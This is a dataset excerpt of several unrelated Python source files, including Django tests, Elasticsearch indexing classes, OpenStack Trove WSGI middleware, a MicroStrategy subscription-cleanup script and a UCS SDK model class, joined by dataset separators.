def request_translator(self, jsonstring):
"""
takes the response from api requester,
- filters the data key
- json loads converts to python recognizable objects
"""
translated_response = json.loads(jsonstring)
return translated_response['data']
def csvwriter(self, thread_list):
with open('messages.csv','a') as f:
writer = DictWriter(f,fieldnames=EnvVariables.csv_keys)
for dic in thread_list:
writer.writerow(dic)
pass
def filewriter(self, thread_list):
with open("test.json", mode='a') as f:
for dic in thread_list:
json.dump(dic, f, separators=(',',':'))
pass
#! this is not working and hence unused.
def sql_loader(self, thread_list):
cur = self.con.cursor()
while cur:
cur.executemany("INSERT INTO messages VALUES (:d_coords, :d_link_img, :d_link_title, :d_uri, :id, :idd, :parent_id, :type, :updated_at)", thread_list)
self.con.commit()
pass
print("before run")
o = Orchestrator()
print("after run")
|
the-stack_0_6576 | '''10.2 Write a program to read through the mbox-short.txt and figure out the distribution
by hour of the day for each of the messages. You can pull the hour out from the 'From '
line by finding the time and then splitting the string a second time using a colon.
From [email protected] Sat Jan 5 09:14:16 2008
Once you have accumulated the counts for each hour,
print out the counts, sorted by hour as shown below.'''
fname = input("Enter file name: ")
try:
#fh = open(fname)
if len(fname) <= 1 :
fname = "mbox-short.txt"
fh = open(fname)
except:
print('invalid entry!')
quit()
count=dict()
for lin in fh:
lin=lin.rstrip()
if not lin.startswith('From '):
continue
words=lin.split()
time=words[5]
hr=time.split(':')
hour=hr[0]
count[hour]=count.get(hour,0)+1
# to print all the emails and the numbers print(count)
lst=list()
for key,val in count.items():
tup=(key,val)
lst.append(tup)
lst=sorted(lst)
for key,val in lst:
print(key,val)
|
the-stack_0_6578 | from __future__ import absolute_import
from django.test import TestCase
from .models import Reporter, Article
class ManyToOneNullTests(TestCase):
def setUp(self):
# Create a Reporter.
self.r = Reporter(name='John Smith')
self.r.save()
# Create an Article.
self.a = Article(headline="First", reporter=self.r)
self.a.save()
# Create an Article via the Reporter object.
self.a2 = self.r.article_set.create(headline="Second")
# Create an Article with no Reporter by passing "reporter=None".
self.a3 = Article(headline="Third", reporter=None)
self.a3.save()
# Create another article and reporter
self.r2 = Reporter(name='Paul Jones')
self.r2.save()
self.a4 = self.r2.article_set.create(headline='Fourth')
def test_get_related(self):
self.assertEqual(self.a.reporter.id, self.r.id)
# Article objects have access to their related Reporter objects.
r = self.a.reporter
self.assertEqual(r.id, self.r.id)
def test_created_via_related_set(self):
self.assertEqual(self.a2.reporter.id, self.r.id)
def test_related_set(self):
# Reporter objects have access to their related Article objects.
self.assertQuerysetEqual(self.r.article_set.all(),
['<Article: First>', '<Article: Second>'])
self.assertQuerysetEqual(self.r.article_set.filter(headline__startswith='Fir'),
['<Article: First>'])
self.assertEqual(self.r.article_set.count(), 2)
def test_created_without_related(self):
self.assertEqual(self.a3.reporter, None)
# Need to reget a3 to refresh the cache
a3 = Article.objects.get(pk=self.a3.pk)
self.assertRaises(AttributeError, getattr, a3.reporter, 'id')
# Accessing an article's 'reporter' attribute returns None
# if the reporter is set to None.
self.assertEqual(a3.reporter, None)
# To retrieve the articles with no reporters set, use "reporter__isnull=True".
self.assertQuerysetEqual(Article.objects.filter(reporter__isnull=True),
['<Article: Third>'])
# We can achieve the same thing by filtering for the case where the
# reporter is None.
self.assertQuerysetEqual(Article.objects.filter(reporter=None),
['<Article: Third>'])
# Set the reporter for the Third article
self.assertQuerysetEqual(self.r.article_set.all(),
['<Article: First>', '<Article: Second>'])
self.r.article_set.add(a3)
self.assertQuerysetEqual(self.r.article_set.all(),
['<Article: First>', '<Article: Second>', '<Article: Third>'])
# Remove an article from the set, and check that it was removed.
self.r.article_set.remove(a3)
self.assertQuerysetEqual(self.r.article_set.all(),
['<Article: First>', '<Article: Second>'])
self.assertQuerysetEqual(Article.objects.filter(reporter__isnull=True),
['<Article: Third>'])
def test_remove_from_wrong_set(self):
self.assertQuerysetEqual(self.r2.article_set.all(), ['<Article: Fourth>'])
# Try to remove a4 from a set it does not belong to
self.assertRaises(Reporter.DoesNotExist, self.r.article_set.remove, self.a4)
self.assertQuerysetEqual(self.r2.article_set.all(), ['<Article: Fourth>'])
def test_assign_clear_related_set(self):
# Use descriptor assignment to allocate ForeignKey. Null is legal, so
# existing members of set that are not in the assignment set are set null
self.r2.article_set = [self.a2, self.a3]
self.assertQuerysetEqual(self.r2.article_set.all(),
['<Article: Second>', '<Article: Third>'])
# Clear the rest of the set
self.r.article_set.clear()
self.assertQuerysetEqual(self.r.article_set.all(), [])
self.assertQuerysetEqual(Article.objects.filter(reporter__isnull=True),
['<Article: First>', '<Article: Fourth>'])
def test_clear_efficiency(self):
r = Reporter.objects.create()
for _ in xrange(3):
r.article_set.create()
with self.assertNumQueries(1):
r.article_set.clear()
self.assertEqual(r.article_set.count(), 0) |
the-stack_0_6579 | """
Search indexing classes to index into Elasticsearch.
Django settings that should be defined:
`ES_HOSTS`: A list of hosts where Elasticsearch lives. E.g.
['192.168.1.1:9200', '192.168.2.1:9200']
`ES_DEFAULT_NUM_REPLICAS`: An integer of the number of replicas.
`ES_DEFAULT_NUM_SHARDS`: An integer of the number of shards.
TODO: Handle page removal case in Page.
"""
from __future__ import absolute_import
from builtins import object
import datetime
from elasticsearch import Elasticsearch, exceptions
from elasticsearch.helpers import bulk
from django.conf import settings
class Index(object):
"""Base class to define some common methods across indexes."""
# The _index and _type define the URL path to Elasticsearch, e.g.:
# http://localhost:9200/{_index}/{_type}/_search
_index = 'readthedocs'
_type = None
def __init__(self):
self.es = Elasticsearch(settings.ES_HOSTS)
def get_settings(self, settings_override=None):
"""
Returns settings to be passed to ES create_index.
If `settings_override` is provided, this will use `settings_override`
to override the defaults defined here.
"""
default_settings = {
'number_of_replicas': settings.ES_DEFAULT_NUM_REPLICAS,
'number_of_shards': settings.ES_DEFAULT_NUM_SHARDS,
'refresh_interval': '5s',
'analysis': self.get_analysis(),
}
if settings_override:
default_settings.update(settings_override)
return default_settings
def get_analysis(self):
"""
Returns the analysis dict to be used in settings for create_index.
For languages that ES supports we define either the minimal or light
stemming, which isn't as aggressive as the snowball stemmer. We also
define the stopwords for that language.
For all languages we've customized we're using the ICU plugin.
"""
analyzers = {}
filters = {}
# The default is used for fields that need ICU but are composed of
# many languages.
analyzers['default_icu'] = {
'type': 'custom',
'tokenizer': 'icu_tokenizer',
'filter': ['custom_word_delimiter', 'icu_folding', 'icu_normalizer', 'lowercase'],
}
# Customize the word_delimiter filter to set various options.
filters['custom_word_delimiter'] = {
'type': 'word_delimiter',
'preserve_original': True,
}
return {
'analyzer': analyzers,
'filter': filters,
}
def timestamped_index(self):
return '{0}-{1}'.format(
self._index, datetime.datetime.now().strftime('%Y%m%d%H%M%S'))
def create_index(self, index=None):
"""
Creates index.
This uses `get_settings` and `get_mappings` to define the index.
"""
index = index or self._index
body = {
'settings': self.get_settings(),
}
self.es.indices.create(index=index, body=body)
def put_mapping(self, index=None):
index = index or self._index
self.es.indices.put_mapping(self._type, self.get_mapping(), index)
def bulk_index(self, data, index=None, chunk_size=500, parent=None,
routing=None):
"""
Given a list of documents, uses Elasticsearch bulk indexing.
For each doc this calls `extract_document`, then indexes.
`chunk_size` defaults to the elasticsearch lib's default. Override per
your document size as needed.
"""
index = index or self._index
docs = []
for d in data:
source = self.extract_document(d)
doc = {
'_index': index,
'_type': self._type,
'_source': source,
'_id': d['id'],
}
if routing:
doc['_routing'] = routing
docs.append(doc)
# TODO: This doesn't work with the new ES setup.
bulk(self.es, docs, chunk_size=chunk_size)
def index_document(self, data, index=None, parent=None, routing=None):
doc = self.extract_document(data)
kwargs = {
'index': index or self._index,
'doc_type': self._type,
'body': doc,
'id': doc['id']
}
if parent:
kwargs['parent'] = parent
if routing:
kwargs['routing'] = routing
self.es.index(**kwargs)
def delete_document(self, body, index=None, parent=None, routing=None):
kwargs = {
'index': index or self._index,
'doc_type': self._type,
'body': body,
}
if parent:
kwargs['parent'] = parent
if routing:
kwargs['routing'] = routing
return self.es.delete_by_query(**kwargs)
def get_mapping(self):
"""Returns the mapping for this _index and _type."""
raise NotImplementedError()
def extract_document(self, data):
"""Extracts the Elasticsearch document for this object instance."""
raise NotImplementedError()
def update_aliases(self, new_index, delete=True):
"""
Points `_index` to `new_index` and deletes `_index` if delete=True.
The ES `update_aliases` is atomic.
"""
old_index = None
# Get current alias, if any.
try:
aliases = self.es.indices.get_alias(name=self._index)
if aliases and list(aliases.keys()):
old_index = list(aliases.keys())[0]
except exceptions.NotFoundError:
pass
actions = []
if old_index:
actions.append({'remove': {'index': old_index,
'alias': self._index}})
actions.append({'add': {'index': new_index, 'alias': self._index}})
self.es.indices.update_aliases(body={'actions': actions})
# Delete old index if any and if specified.
if delete and old_index:
self.es.indices.delete(index=old_index)
def search(self, body, **kwargs):
return self.es.search(index=self._index, doc_type=self._type,
body=body, **kwargs)
class ProjectIndex(Index):
"""Search index configuration for Projects"""
_type = 'project'
def get_mapping(self):
mapping = {
self._type: {
# Disable _all field to reduce index size.
'_all': {'enabled': False},
'properties': {
'id': {'type': 'keyword'},
'name': {'type': 'text', 'analyzer': 'default_icu'},
'description': {'type': 'text', 'analyzer': 'default_icu'},
'slug': {'type': 'keyword'},
'lang': {'type': 'keyword'},
'tags': {'type': 'keyword'},
'privacy': {'type': 'keyword'},
'author': {
'type': 'text',
'analyzer': 'default_icu',
'fields': {
'raw': {
'type': 'keyword',
},
},
},
'url': {'type': 'keyword'},
# Add a weight field to enhance relevancy scoring.
'weight': {'type': 'float'},
'progetto': {'type': 'keyword'},
'publisher': {'type': 'keyword'},
}
}
}
return mapping
def extract_document(self, data):
doc = {}
attrs = ('id', 'name', 'slug', 'description', 'lang', 'tags', 'author', 'url',
'progetto', 'publisher', 'private')
for attr in attrs:
doc[attr] = data.get(attr, '')
# Add project boost.
doc['weight'] = data.get('weight', 1.0)
return doc
class PageIndex(Index):
"""Search index configuration for Pages"""
_type = 'page'
_parent = 'project'
def get_mapping(self):
mapping = {
self._type: {
# Disable _all field to reduce index size.
'_all': {'enabled': False},
'properties': {
'id': {'type': 'keyword'},
'sha': {'type': 'keyword'},
'project': {'type': 'keyword'},
'project_id': {'type': 'keyword'},
'version': {'type': 'keyword'},
'path': {'type': 'keyword'},
'taxonomy': {'type': 'keyword'},
'commit': {'type': 'keyword'},
'title': {'type': 'text', 'analyzer': 'default_icu'},
'headers': {'type': 'text', 'analyzer': 'default_icu'},
'content': {'type': 'text', 'analyzer': 'default_icu'},
# Add a weight field to enhance relevancy scoring.
'weight': {'type': 'float'},
'progetto': {'type': 'keyword'},
'publisher': {'type': 'keyword'},
}
}
}
return mapping
def extract_document(self, data):
doc = {}
attrs = ('id', 'project_id', 'project', 'title', 'headers', 'version', 'path',
'content', 'taxonomy', 'commit', 'progetto', 'publisher', 'private')
for attr in attrs:
doc[attr] = data.get(attr, '')
# Add page boost.
doc['weight'] = data.get('weight', 1.0)
return doc
class SectionIndex(Index):
"""Search index configuration for Sections"""
_type = 'section'
_parent = 'page'
def get_mapping(self):
mapping = {
self._type: {
# Disable _all field to reduce index size.
'_all': {'enabled': False},
# Commenting this out until we need it.
# 'suggest': {
# "type": "completion",
# "index_analyzer": "simple",
# "search_analyzer": "simple",
# "payloads": True,
# },
'properties': {
'id': {'type': 'keyword'},
'project': {'type': 'keyword'},
'version': {'type': 'keyword'},
'path': {'type': 'keyword'},
'page_id': {'type': 'keyword'},
'commit': {'type': 'keyword'},
'title': {'type': 'text', 'analyzer': 'default_icu'},
'content': {'type': 'text', 'analyzer': 'default_icu'},
'blocks': {
'type': 'object',
'properties': {
'code': {'type': 'text', 'analyzer': 'default_icu'}
}
},
# Add a weight field to enhance relevancy scoring.
'weight': {'type': 'float'},
}
}
}
return mapping
def extract_document(self, data):
doc = {}
attrs = ('id', 'project', 'title', 'page_id', 'version', 'path', 'content', 'commit')
for attr in attrs:
doc[attr] = data.get(attr, '')
# Add page boost.
doc['weight'] = data.get('weight', 1.0)
return doc
|
the-stack_0_6581 | # Copyright 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Wsgi helper utilities for trove"""
import math
import re
import time
import traceback
import uuid
import eventlet.wsgi
import jsonschema
from oslo_log import log as logging
from oslo_serialization import jsonutils
from oslo_service import service
import paste.urlmap
import webob
import webob.dec
import webob.exc
from trove.common import base_wsgi
from trove.common import cfg
from trove.common import context as rd_context
from trove.common import exception
from trove.common.i18n import _
from trove.common import pastedeploy
from trove.common import utils
CONTEXT_KEY = 'trove.context'
Router = base_wsgi.Router
Debug = base_wsgi.Debug
Middleware = base_wsgi.Middleware
JSONDictSerializer = base_wsgi.JSONDictSerializer
RequestDeserializer = base_wsgi.RequestDeserializer
CONF = cfg.CONF
# Raise the default from 8192 to accommodate large tokens
eventlet.wsgi.MAX_HEADER_LINE = CONF.max_header_line
eventlet.patcher.monkey_patch(all=False, socket=True)
LOG = logging.getLogger('trove.common.wsgi')
def versioned_urlmap(*args, **kwargs):
urlmap = paste.urlmap.urlmap_factory(*args, **kwargs)
return VersionedURLMap(urlmap)
def launch(app_name, port, paste_config_file, data={},
host='0.0.0.0', backlog=128, threads=1000, workers=None):
"""Launches a wsgi server based on the passed in paste_config_file.
Launch provides a easy way to create a paste app from the config
file and launch it via the service launcher. It takes care of
all of the plumbing. The only caveat is that the paste_config_file
must be a file that paste.deploy can find and handle. There is
a helper method in cfg.py that finds files.
Example:
conf_file = CONF.find_file(CONF.api_paste_config)
launcher = wsgi.launch('myapp', CONF.bind_port, conf_file)
launcher.wait()
"""
LOG.debug("Trove started on %s", host)
app = pastedeploy.paste_deploy_app(paste_config_file, app_name, data)
server = base_wsgi.Service(app, port, host=host,
backlog=backlog, threads=threads)
return service.launch(CONF, server, workers)
# Note: taken from Nova
def serializers(**serializers):
"""Attaches serializers to a method.
This decorator associates a dictionary of serializers with a
method. Note that the function attributes are directly
manipulated; the method is not wrapped.
"""
def decorator(func):
if not hasattr(func, 'wsgi_serializers'):
func.wsgi_serializers = {}
func.wsgi_serializers.update(serializers)
return func
return decorator
class TroveMiddleware(Middleware):
# Note: taken from nova
@classmethod
def factory(cls, global_config, **local_config):
"""Used for paste app factories in paste.deploy config files.
Any local configuration (that is, values under the [filter:APPNAME]
section of the paste config) will be passed into the `__init__` method
as kwargs.
A hypothetical configuration would look like:
[filter:analytics]
redis_host = 127.0.0.1
paste.filter_factory = nova.api.analytics:Analytics.factory
which would result in a call to the `Analytics` class as
import nova.api.analytics
analytics.Analytics(app_from_paste, redis_host='127.0.0.1')
You could of course re-implement the `factory` method in subclasses,
but using the kwarg passing it shouldn't be necessary.
"""
def _factory(app):
return cls(app, **local_config)
return _factory
class VersionedURLMap(object):
def __init__(self, urlmap):
self.urlmap = urlmap
def __call__(self, environ, start_response):
req = Request(environ)
if req.url_version is None and req.accept_version is not None:
version = "/v" + req.accept_version
http_exc = webob.exc.HTTPNotAcceptable(_("version not supported"))
app = self.urlmap.get(version, Fault(http_exc))
else:
app = self.urlmap
return app(environ, start_response)
class Router(base_wsgi.Router):
# Original router did not allow for serialization of the 404 error.
# To fix this the _dispatch was modified to use Fault() objects.
@staticmethod
@webob.dec.wsgify
def _dispatch(req):
"""
Called by self._router after matching the incoming request to a route
and putting the information into req.environ. Either returns 404
or the routed WSGI app's response.
"""
match = req.environ['wsgiorg.routing_args'][1]
if not match:
return Fault(webob.exc.HTTPNotFound())
app = match['controller']
return app
class Request(base_wsgi.Request):
@property
def params(self):
return utils.stringify_keys(super(Request, self).params)
def best_match_content_type(self, supported_content_types=None):
"""Determine the most acceptable content-type.
Based on the query extension then the Accept header.
"""
parts = self.path.rsplit('.', 1)
if len(parts) > 1:
format = parts[1]
if format in ['json']:
return 'application/{0}'.format(parts[1])
ctypes = {
'application/vnd.openstack.trove+json': "application/json",
'application/json': "application/json",
}
bm = self.accept.best_match(ctypes.keys())
return ctypes.get(bm, 'application/json')
@utils.cached_property
def accept_version(self):
accept_header = self.headers.get('ACCEPT', "")
accept_version_re = re.compile(".*?application/vnd.openstack.trove"
"(\+.+?)?;"
"version=(?P<version_no>\d+\.?\d*)")
match = accept_version_re.search(accept_header)
return match.group("version_no") if match else None
@utils.cached_property
def url_version(self):
versioned_url_re = re.compile("/v(?P<version_no>\d+\.?\d*)")
match = versioned_url_re.search(self.path)
return match.group("version_no") if match else None
class Result(object):
"""A result whose serialization is compatible with JSON."""
def __init__(self, data, status=200):
self._data = data
self.status = status
def data(self, serialization_type):
"""Return an appropriate serialized type for the body.
serialization_type is not used presently, but may be
in the future, so it stays.
"""
if hasattr(self._data, "data_for_json"):
return self._data.data_for_json()
return self._data
class Resource(base_wsgi.Resource):
def __init__(self, controller, deserializer, serializer,
exception_map=None):
exception_map = exception_map or {}
self.model_exception_map = self._invert_dict_list(exception_map)
super(Resource, self).__init__(controller, deserializer, serializer)
@webob.dec.wsgify(RequestClass=Request)
def __call__(self, request):
return super(Resource, self).__call__(request)
def execute_action(self, action, request, **action_args):
if getattr(self.controller, action, None) is None:
return Fault(webob.exc.HTTPNotFound())
try:
self.controller.validate_request(action, action_args)
result = super(Resource, self).execute_action(
action,
request,
**action_args)
if type(result) is dict:
result = Result(result)
return result
except exception.TroveError as trove_error:
LOG.debug(traceback.format_exc())
LOG.debug("Caught Trove Error %s", trove_error)
httpError = self._get_http_error(trove_error)
LOG.debug("Mapped Error to %s", httpError)
return Fault(httpError(str(trove_error), request=request))
except webob.exc.HTTPError as http_error:
LOG.debug(traceback.format_exc())
return Fault(http_error)
except Exception as error:
exception_uuid = str(uuid.uuid4())
LOG.exception(exception_uuid + ": " + str(error))
return Fault(webob.exc.HTTPInternalServerError(
"Internal Server Error. Please keep this ID to help us "
"figure out what went wrong: (%s)." % exception_uuid,
request=request))
def _get_http_error(self, error):
return self.model_exception_map.get(type(error),
webob.exc.HTTPBadRequest)
def _invert_dict_list(self, exception_dict):
"""Flattens values of keys and inverts keys and values.
Example:
{'x': [1, 2, 3], 'y': [4, 5, 6]} converted to
{1: 'x', 2: 'x', 3: 'x', 4: 'y', 5: 'y', 6: 'y'}
"""
inverted_dict = {}
for key, value_list in exception_dict.items():
for value in value_list:
inverted_dict[value] = key
return inverted_dict
def serialize_response(self, action, action_result, accept):
# If an exception is raised here in the base class, it is swallowed,
# and the action_result is returned as-is. For us, that's bad news -
# we never want that to happen except in the case of webob types.
# So we override the behavior here so we can at least log it.
try:
return super(Resource, self).serialize_response(
action, action_result, accept)
except Exception:
# execute_action either returns the results or a Fault object.
# If action_result is not a Fault then there really was a
# serialization error which we log. Otherwise return the Fault.
if not isinstance(action_result, Fault):
LOG.exception(_("Unserializable result detected."))
raise
return action_result
class Controller(object):
"""Base controller that creates a Resource with default serializers."""
exception_map = {
webob.exc.HTTPUnprocessableEntity: [
exception.UnprocessableEntity,
],
webob.exc.HTTPUnauthorized: [
exception.Forbidden,
exception.SwiftAuthError,
],
webob.exc.HTTPForbidden: [
exception.ReplicaSourceDeleteForbidden,
exception.BackupTooLarge,
exception.ModuleAccessForbidden,
exception.ModuleAppliedToInstance,
],
webob.exc.HTTPBadRequest: [
exception.InvalidModelError,
exception.BadRequest,
exception.CannotResizeToSameSize,
exception.BadValue,
exception.DatabaseAlreadyExists,
exception.UserAlreadyExists,
exception.LocalStorageNotSpecified,
exception.ModuleAlreadyExists,
],
webob.exc.HTTPNotFound: [
exception.NotFound,
exception.ComputeInstanceNotFound,
exception.ModelNotFoundError,
exception.UserNotFound,
exception.DatabaseNotFound,
exception.QuotaResourceUnknown,
exception.BackupFileNotFound,
exception.ClusterNotFound,
exception.DatastoreNotFound,
exception.SwiftNotFound,
exception.ModuleTypeNotFound,
],
webob.exc.HTTPConflict: [
exception.BackupNotCompleteError,
exception.RestoreBackupIntegrityError,
],
webob.exc.HTTPRequestEntityTooLarge: [
exception.OverLimit,
exception.QuotaExceeded,
exception.VolumeQuotaExceeded,
],
webob.exc.HTTPServerError: [
exception.VolumeCreationFailure,
exception.UpdateGuestError,
],
webob.exc.HTTPNotImplemented: [
exception.VolumeNotSupported,
exception.LocalStorageNotSupported,
exception.DatastoreOperationNotSupported,
exception.ClusterInstanceOperationNotSupported,
exception.ClusterDatastoreNotSupported
],
}
schemas = {}
@classmethod
def get_schema(cls, action, body):
LOG.debug("Getting schema for %s:%s" %
(cls.__class__.__name__, action))
if cls.schemas:
matching_schema = cls.schemas.get(action, {})
if matching_schema:
LOG.debug(
"Found Schema: %s" % matching_schema.get("name",
matching_schema))
return matching_schema
@staticmethod
def format_validation_msg(errors):
# format path like object['field1'][i]['subfield2']
messages = []
for error in errors:
path = list(error.path)
f_path = "%s%s" % (path[0],
''.join(['[%r]' % i for i in path[1:]]))
messages.append("%s %s" % (f_path, error.message))
for suberror in sorted(error.context, key=lambda e: e.schema_path):
messages.append(suberror.message)
error_msg = "; ".join(messages)
return "Validation error: %s" % error_msg
def validate_request(self, action, action_args):
body = action_args.get('body', {})
schema = self.get_schema(action, body)
if schema:
validator = jsonschema.Draft4Validator(schema)
if not validator.is_valid(body):
errors = sorted(validator.iter_errors(body),
key=lambda e: e.path)
error_msg = self.format_validation_msg(errors)
LOG.info(error_msg)
raise exception.BadRequest(message=error_msg)
def create_resource(self):
return Resource(
self,
RequestDeserializer(),
TroveResponseSerializer(),
self.exception_map)
def _extract_limits(self, params):
return {key: params[key] for key in params.keys()
if key in ["limit", "marker"]}
class TroveResponseSerializer(base_wsgi.ResponseSerializer):
def serialize_body(self, response, data, content_type, action):
"""Overrides body serialization in base_wsgi.ResponseSerializer.
If the "data" argument is the Result class, its data
method is called and *that* is passed to the superclass implementation
instead of the actual data.
"""
if isinstance(data, Result):
data = data.data(content_type)
super(TroveResponseSerializer, self).serialize_body(
response,
data,
content_type,
action)
def serialize_headers(self, response, data, action):
super(TroveResponseSerializer, self).serialize_headers(
response,
data,
action)
if isinstance(data, Result):
response.status = data.status
class Fault(webob.exc.HTTPException):
"""Error codes for API faults."""
code_wrapper = {
400: webob.exc.HTTPBadRequest,
401: webob.exc.HTTPUnauthorized,
403: webob.exc.HTTPUnauthorized,
404: webob.exc.HTTPNotFound,
}
resp_codes = [int(code) for code in code_wrapper.keys()]
def __init__(self, exception):
"""Create a Fault for the given webob.exc.exception."""
self.wrapped_exc = exception
@staticmethod
def _get_error_name(exc):
# Displays a Red Dwarf specific error name instead of a webob exc name.
named_exceptions = {
'HTTPBadRequest': 'badRequest',
'HTTPUnauthorized': 'unauthorized',
'HTTPForbidden': 'forbidden',
'HTTPNotFound': 'itemNotFound',
'HTTPMethodNotAllowed': 'badMethod',
'HTTPRequestEntityTooLarge': 'overLimit',
'HTTPUnsupportedMediaType': 'badMediaType',
'HTTPInternalServerError': 'instanceFault',
'HTTPNotImplemented': 'notImplemented',
'HTTPServiceUnavailable': 'serviceUnavailable',
}
name = exc.__class__.__name__
if name in named_exceptions:
return named_exceptions[name]
# If the exception isn't in our list, at least strip off the
# HTTP from the name, and then drop the case on the first letter.
name = name.split("HTTP").pop()
name = name[:1].lower() + name[1:]
return name
@webob.dec.wsgify(RequestClass=Request)
def __call__(self, req):
"""Generate a WSGI response based on the exception passed to ctor."""
# Replace the body with fault details.
fault_name = Fault._get_error_name(self.wrapped_exc)
fault_data = {
fault_name: {
'code': self.wrapped_exc.status_int,
}
}
if self.wrapped_exc.detail:
fault_data[fault_name]['message'] = self.wrapped_exc.detail
else:
fault_data[fault_name]['message'] = self.wrapped_exc.explanation
content_type = req.best_match_content_type()
serializer = {
'application/json': base_wsgi.JSONDictSerializer(),
}[content_type]
self.wrapped_exc.body = serializer.serialize(fault_data, content_type)
self.wrapped_exc.content_type = content_type
return self.wrapped_exc
class ContextMiddleware(base_wsgi.Middleware):
def __init__(self, application):
self.admin_roles = CONF.admin_roles
super(ContextMiddleware, self).__init__(application)
def _extract_limits(self, params):
return {key: params[key] for key in params.keys()
if key in ["limit", "marker"]}
def process_request(self, request):
service_catalog = None
catalog_header = request.headers.get('X-Service-Catalog', None)
if catalog_header:
try:
service_catalog = jsonutils.loads(catalog_header)
except ValueError:
raise webob.exc.HTTPInternalServerError(
_('Invalid service catalog json.'))
tenant_id = request.headers.get('X-Tenant-Id', None)
auth_token = request.headers["X-Auth-Token"]
user_id = request.headers.get('X-User-ID', None)
roles = request.headers.get('X-Role', '').split(',')
is_admin = False
for role in roles:
if role.lower() in self.admin_roles:
is_admin = True
break
limits = self._extract_limits(request.params)
context = rd_context.TroveContext(auth_token=auth_token,
tenant=tenant_id,
user=user_id,
is_admin=is_admin,
limit=limits.get('limit'),
marker=limits.get('marker'),
service_catalog=service_catalog)
request.environ[CONTEXT_KEY] = context
@classmethod
def factory(cls, global_config, **local_config):
def _factory(app):
LOG.debug("Created context middleware with config: %s" %
local_config)
return cls(app)
return _factory
class FaultWrapper(base_wsgi.Middleware):
"""Calls down the middleware stack, making exceptions into faults."""
@webob.dec.wsgify(RequestClass=base_wsgi.Request)
def __call__(self, req):
try:
resp = req.get_response(self.application)
if resp.status_int in Fault.resp_codes:
for (header, value) in resp._headerlist:
if header == "Content-Type" and \
value == "text/plain; charset=UTF-8":
return Fault(Fault.code_wrapper[resp.status_int]())
return resp
return resp
except Exception as ex:
LOG.exception(_("Caught error: %s."), unicode(ex))
exc = webob.exc.HTTPInternalServerError()
return Fault(exc)
@classmethod
def factory(cls, global_config, **local_config):
def _factory(app):
return cls(app)
return _factory
# ported from Nova
class OverLimitFault(webob.exc.HTTPException):
"""
Rate-limited request response.
"""
def __init__(self, message, details, retry_time):
"""
Initialize new `OverLimitFault` with relevant information.
"""
hdrs = OverLimitFault._retry_after(retry_time)
self.wrapped_exc = webob.exc.HTTPRequestEntityTooLarge(headers=hdrs)
self.content = {"overLimit": {"code": self.wrapped_exc.status_int,
"message": message,
"details": details,
"retryAfter": hdrs['Retry-After'],
},
}
@staticmethod
def _retry_after(retry_time):
delay = int(math.ceil(retry_time - time.time()))
retry_after = delay if delay > 0 else 0
headers = {'Retry-After': '%d' % retry_after}
return headers
@webob.dec.wsgify(RequestClass=Request)
def __call__(self, request):
"""
Return the wrapped exception with a serialized body conforming to our
error format.
"""
content_type = request.best_match_content_type()
serializer = {'application/json': JSONDictSerializer(),
}[content_type]
content = serializer.serialize(self.content)
self.wrapped_exc.body = content
self.wrapped_exc.content_type = content_type
return self.wrapped_exc
class ActionDispatcher(object):
"""Maps method name to local methods through action name."""
def dispatch(self, *args, **kwargs):
"""Find and call local method."""
action = kwargs.pop('action', 'default')
action_method = getattr(self, str(action), self.default)
return action_method(*args, **kwargs)
def default(self, data):
raise NotImplementedError()
class DictSerializer(ActionDispatcher):
"""Default request body serialization."""
def serialize(self, data, action='default'):
return self.dispatch(data, action=action)
def default(self, data):
return ""
class JSONDictSerializer(DictSerializer):
"""Default JSON request body serialization."""
def default(self, data):
return jsonutils.dumps(data)
|
the-stack_0_6582 | from mstrio.users_and_groups import list_users
from mstrio.api.projects import get_projects
from mstrio.distribution_services.subscription.subscription_manager import SubscriptionManager
from mstrio.connection import Connection
def delete_subscriptions_of_departed_users(connection: "Connection") -> None:
"""Delete all subscription in all projects which owners are departed users.
Args:
Args:
connection: MicroStrategy connection object returned by
`connection.Connection()`
"""
# get all projects that the authenticated user has access to
response = get_projects(connection, whitelist=[('ERR014', 403)])
prjcts = response.json() if response.ok else []
# get all disabled users
all_usrs = list_users(connection=connection)
dsbld_usrs = [u for u in all_usrs if not u.enabled]
for prjct in prjcts:
project_id = prjct['id']
sub_mngr = SubscriptionManager(connection=connection, project_id=project_id)
for usr in dsbld_usrs:
subs = sub_mngr.list_subscriptions(owner={'id': usr.id})
msg = f"subscriptions of user with ID: {usr.id}"
msg += f" in project {prjct.name} with ID: {prjct.id}"
# call of the function below returns True if all passed
# subscriptions were deleted
if sub_mngr.delete(subscriptions=subs, force=True):
print("All " + msg + " were deleted.")
else:
print("Not all " + msg + " were deleted or there was no subsscriptions.")
|
the-stack_0_6583 | """This module contains the general information for LsbootSanCatSanImage ManagedObject."""
from ...ucsmo import ManagedObject
from ...ucscoremeta import MoPropertyMeta, MoMeta
from ...ucsmeta import VersionMeta
class LsbootSanCatSanImageConsts:
TYPE_PRIMARY = "primary"
TYPE_SECONDARY = "secondary"
class LsbootSanCatSanImage(ManagedObject):
"""This is LsbootSanCatSanImage class."""
consts = LsbootSanCatSanImageConsts()
naming_props = set([u'type'])
mo_meta = MoMeta("LsbootSanCatSanImage", "lsbootSanCatSanImage", "sanimg-[type]", VersionMeta.Version221b, "InputOutput", 0x7f, [], ["admin", "ls-compute", "ls-config", "ls-config-policy", "ls-server", "ls-server-policy", "ls-storage", "ls-storage-policy"], [u'lsbootSan'], [u'lsbootSanCatSanImagePath'], ["Add", "Get", "Remove", "Set"])
prop_meta = {
"child_action": MoPropertyMeta("child_action", "childAction", "string", VersionMeta.Version221b, MoPropertyMeta.INTERNAL, 0x2, None, None, r"""((deleteAll|ignore|deleteNonPresent),){0,2}(deleteAll|ignore|deleteNonPresent){0,1}""", [], []),
"dn": MoPropertyMeta("dn", "dn", "string", VersionMeta.Version221b, MoPropertyMeta.READ_ONLY, 0x4, 0, 256, None, [], []),
"rn": MoPropertyMeta("rn", "rn", "string", VersionMeta.Version221b, MoPropertyMeta.READ_ONLY, 0x8, 0, 256, None, [], []),
